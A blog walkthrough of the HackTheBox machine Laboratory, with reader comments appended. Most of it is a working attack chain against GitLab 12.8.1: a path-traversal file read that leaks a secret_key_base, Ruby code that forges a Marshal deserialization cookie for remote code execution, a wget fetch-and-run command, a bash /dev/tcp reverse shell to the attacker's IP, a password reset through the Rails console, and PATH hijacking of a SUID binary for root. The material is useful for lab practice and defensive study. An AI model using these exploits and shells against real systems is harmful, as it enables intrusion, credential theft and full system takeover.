Hello guys, this is my new blog where I'll be posting write-ups on HackTheBox machines.
This write-up is for the machine Laboratory, which was created by 0xc45.
It is rated easy, but I would rate the difficulty at 8/10.
This box was a lot of fun and I learned a lot.
Without further ado, let's begin,
Foothold :-
Before starting to look around the machine, it's always a good habit to add the IP to your hosts file.
As usual, I'll run an nmap scan and see what info we can get on this machine,
# Nmap 7.80 scan initiated Thu Nov 19 07:04:38 2020 as: nmap -A -oN nmapscans -vvv -p 22,80,443 10.10.10.216
Nmap scan report for laboratory.htb (10.10.10.216)
Host is up, received syn-ack (0.27s latency).
Scanned at 2020-11-19 07:04:39 EST for 27s

PORT    STATE SERVICE  REASON  VERSION
22/tcp  open  ssh      syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     syn-ack Apache httpd 2.4.41
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open  ssl/http syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Issuer: commonName=laboratory.htb
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-07-05T10:39:28
| Not valid after:  2024-03-03T10:39:28
| MD5:   2873 91a5 5022 f323 4b95 df98 b61a eb6c
| SHA-1: 0875 3a7e eef6 8f50 0349 510d 9fbf abc3 c70a a1ca
| tls-alpn:
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 19 07:05:06 2020 -- 1 IP address (1 host up) scanned in 27.95 seconds
So we find 3 open ports:-
- 22 - ssh
- 80 - http
- 443 - https
We also find an alternative DNS name in the certificate's Subject Alternative Name, i.e. git.laboratory.htb.
Let's add that to our hosts file too and start enumerating.
On visiting laboratory.htb we find a web page,
We also find some potential usernames that may be useful later on,
Let's run a directory scan to see if we can find any interesting directories:-
gobuster dir -u https://laboratory.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
-u:- to specify the URL
-w:- to specify the wordlist
-k:- to skip TLS certificate verification
Well, gobuster didn't give us anything useful, so it's time to check out git.laboratory.htb:-
Ok so we see a sign-in page. The first thing I tried was creating a user and logging in to get some information about this GitLab instance,
After registering we are redirected to the project dashboard,
After messing around with the application for a bit, I found the GitLab version in the Help tab, i.e. Community Edition 12.8.1,
Let's look around the web and see if we can find an exploit or a known vulnerability for this version,
AAAAAAnd... after tremendous searching and testing for hours, I found a report on HackerOne that may work for us here,
So we can perform an arbitrary file read on this application. The steps to do this are as follows:-
- Create two projects
- Add an issue with the following description:-
![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)
- Move the issue to the second project
- The file will be copied to the project
And look at that we see an attachment received back to us,
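The reference above works because the issue body points at an upload path that climbs out of its /uploads/<hash>/ directory. As an added example, not part of this write-up or of GitLab's own code, here is a small Python check a defender could run over issue descriptions to flag such references; the sample inputs are constructed:

```python
# Added example (not from the write-up or GitLab): flag markdown upload
# references that escape the per-project uploads directory.
import posixpath
import re
from urllib.parse import unquote

# GitLab renders an attachment as ![alt](/uploads/<32 hex>/<filename>)
UPLOAD_REF = re.compile(r"!?\[[^\]]*\]\((/uploads/[^)\s]+)\)")
UPLOAD_HASH = re.compile(r"[0-9a-f]{32}")


def is_traversal(ref_path):
    """True unless ref_path is exactly /uploads/<hash>/<file> with no
    '.', '..' or empty segments (URL-encoded dots are decoded first)."""
    decoded = unquote(ref_path)
    # normpath collapses '.', '..' and '//'; any change means such a segment
    # was present, including a '..' that merely hops to another hash dir.
    if posixpath.normpath(decoded) != decoded:
        return True
    parts = decoded.split("/")  # ['', 'uploads', '<hash>', '<file>']
    return not (len(parts) == 4 and parts[1] == "uploads"
                and UPLOAD_HASH.fullmatch(parts[2]) and parts[3] != "")


def find_traversal_refs(markdown):
    """All upload references in an issue description that fail the check."""
    return [m.group(1) for m in UPLOAD_REF.finditer(markdown)
            if is_traversal(m.group(1))]


# Constructed samples: a legitimate attachment and the traversal from above.
SAMPLES = {
    "benign": "![shot](/uploads/0123456789abcdef0123456789abcdef/shot.png)",
    "traversal": "![a](/uploads/11111111111111111111111111111111"
                 "/../../../../../../../../../../../../../../etc/passwd)",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, find_traversal_refs(text))
```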
Now if you follow along with the report, it tells us how to use the arbitrary file read to grab secret_key_base from the secrets.yml file, which is located in /opt/gitlab/embedded/service/gitlab-rails/config/, and use it to get RCE on the box.
And we have access to secrets.yml,
secret_key_base: 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3
Moving on, to get RCE we need to set up the same GitLab version in our local environment and swap in the secret_key_base we just grabbed.
So let's begin setting up our own instance,
We'll manually install gitlab package using this link
- Download the package
curl -s https://packages.gitlab.com/install/repositories/gitlab/gitlab-ce/script.deb.sh | sudo bash
to add the repository that is required to install the package
- use dpkg -i to install the package
- replace the secret_key_base in the secrets.yml file of our local GitLab instance with the one we grabbed
- run gitlab-ctl reconfigure
- run gitlab-ctl restart
- Start gitlab-rails console
When the console starts up you can see the GitLab version number; check it to verify that you installed the correct version,
Let's begin our exploit. First we'll do a PoC to check that our configuration is correct,
# Build a request so we can use Rails' cookie jar with the Marshal serializer
request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
# ERB template whose result runs the test command when the object is deserialized
erb = ERB.new("<%= `echo world > /tmp/helloworld` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
# Sign the cookie with our local instance's secret_key_base (the one taken from the target)
cookies.signed[:cookie] = depr
puts cookies[:cookie]
We'll run this code in our gitlab-rails console and generate a cookie, then we'll send the cookie using,
curl -vvv 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kiWSNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBlY2hvIHdvcmxkID4gL3RtcC9oZWxsb2AgKS50b19zKTsgX2VyYm91dAY6BkVGOg5AZW5jb2RpbmdJdToNRW5jb2RpbmcKVVRGLTgGOwpGOhNAZnJvemVuX3N0cmluZzA6DkBmaWxlbmFtZTA6DEBsaW5lbm9pADoMQG1ldGhvZDoLcmVzdWx0OglAdmFySSIMQHJlc3VsdAY7ClQ6EEBkZXByZWNhdG9ySXU6H0FjdGl2ZVN1cHBvcnQ6OkRlcHJlY2F0aW9uAAY7ClQ=--a11dd2137a51d2d4a57b28e2f72019288142c0cf" -k
(Note:- Make sure to add the -k flag at the end to disable the SSL checks done by curl)
Now perform the same steps as above to grab the /tmp/hello file using the arbitrary file read,
Now that our PoC is working, we can send a payload to receive a reverse shell back,
request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
# Same gadget as the PoC, this time fetching and running rev.sh from our HTTP server
erb = ERB.new("<%= `wget http://10.10.14.116:8000/rev.sh && chmod +x rev.sh && ./rev.sh` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]
What we are doing here is fetching rev.sh from our HTTP server, making it executable and then running it.
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.116/9001 0>&1
We send the cookie using curl as we did previously and,
We get a reverse-shell back as the user git,
User:-
Now that we are in the machine let's begin our enumeration,
Well, linpeas says that we are in a Docker container. Looks like we need to escape.
We spawned a shell inside the gitlab-rails directory, which indicates that we have access to the gitlab-rails console on this machine,
After spending around 2 hours searching for a way to use the gitlab-rails console to help us escape the Docker container, I found a way to reset a user's password using the gitlab-rails console.
Using this method we can reset dexter's GitLab password,
gitlab-rails console -e production
user = User.where(id: 1).first
user.password = 'password'
user.password_confirmation = 'password'
user.save!
Now let's get back to the gitlab login page and see if we can login with this new password,
Voila!! We are in dexter's account. Let's grab those SSH keys and get into the real machine,
Root:-
Now that we are on the real machine, let's begin our enumeration and find out how we can get root privileges,
find / -perm -4000 2>/dev/null
The one particular SUID that stands out to me is /usr/local/bin/docker-security,
Let's take a look and see what this binary holds.
Running the binary produces no output,
Let's debug this binary using ltrace,
(Note:- ltrace is a debugging utility in Linux, used to display the calls a userspace application makes to shared libraries.)
setuid(0)                                        = -1
setgid(0)                                        = -1
system("chmod 700 /usr/bin/docker"chmod: changing permissions of '/usr/bin/docker': Operation not permitted
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                           = 256
system("chmod 660 /var/run/docker.sock"chmod: changing permissions of '/var/run/docker.sock': Operation not permitted
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                           = 256
+++ exited (status 0) +++
Ahh, we can get root access by abusing the PATH variable here: the binary calls chmod by its bare name through system(), so whichever chmod comes first in our PATH is what runs,
cd /tmp
echo "/bin/bash" > chmod
chmod 777 chmod
echo $PATH
export PATH=/tmp:$PATH
cd /usr/local/bin/
./docker-security
And we have root access,
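The ltrace output above shows the root cause: a setuid binary calling system() with bare command names, so the program that actually runs is whatever the caller's PATH resolves first. As an added example, not part of this write-up, the Python below audits ltrace output for exactly that pattern; the sample trace is constructed after the output above, with one extra absolute-path call for contrast:

```python
# Added example (not from the write-up): audit ltrace output of a setuid binary
# for system() calls whose program is a bare name rather than an absolute path.
import re
import shlex

# system("...") as printed by ltrace; the child's stderr may follow the closing
# quote on the same line, so stop at the first unescaped double quote.
SYSTEM_CALL = re.compile(r'^system\("((?:[^"\\]|\\.)*)"')
ENV_ASSIGN = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def command_word(cmdline):
    """Program sh -c would execute: first word after any VAR=value prefixes."""
    try:
        words = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: not parseable, skip
        return None
    for word in words:
        if not ENV_ASSIGN.match(word):
            return word
    return None


def path_dependent_calls(ltrace_output):
    """(program, command line) for every system() call whose program is not
    an absolute path, i.e. whose resolution depends on the caller's PATH."""
    findings = []
    for line in ltrace_output.splitlines():
        m = SYSTEM_CALL.match(line.strip())
        if not m:
            continue
        program = command_word(m.group(1))
        if program is not None and not program.startswith("/"):
            findings.append((program, m.group(1)))
    return findings


# Constructed sample modelled on the docker-security trace above.
SAMPLE_TRACE = """\
setuid(0)                                        = -1
setgid(0)                                        = -1
system("chmod 700 /usr/bin/docker"chmod: changing permissions of '/usr/bin/docker': Operation not permitted
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                           = 256
system("/bin/chmod 660 /var/run/docker.sock" <no return ...>
<... system resumed> )                           = 0
+++ exited (status 0) +++
"""

if __name__ == "__main__":
    for program, cmd in path_dependent_calls(SAMPLE_TRACE):
        print(f"PATH-dependent: {program!r} in system({cmd!r})")
```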
If you enjoyed the write-up feel free to leave me a review on any of my social accounts:-
Discord:- deepansh0xB#9762
Twitter:- https://twitter.com/DeepanshPahwa11
Have a great day!!!
Comments:-

depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)

permission denied
HELP HELP HELP !!!

depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
--2021-01-09 17:25:14--  http://10.10.16.180:8000/rev.sh
Connecting to 10.10.16.180:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 55 [text/x-sh]
rev.sh: Permission denied
Cannot write to ‘rev.sh’ (Permission denied).
=> ""
Hey, same error, help plz

Same here CSPSHIVAM, that message and also this on the PoC

SyntaxError ((irb):23: syntax error, unexpected tSTRING_BEG, expecting do or '{' or '(')
curl -vvv 'http://git.laboratory.htb/use...
          ^
(irb):23: syntax error, unexpected tSTRING_BEG, expecting do or '{' or '('
...oratory.htb/users/sign_in' -b "experimentation_subject_id=BA...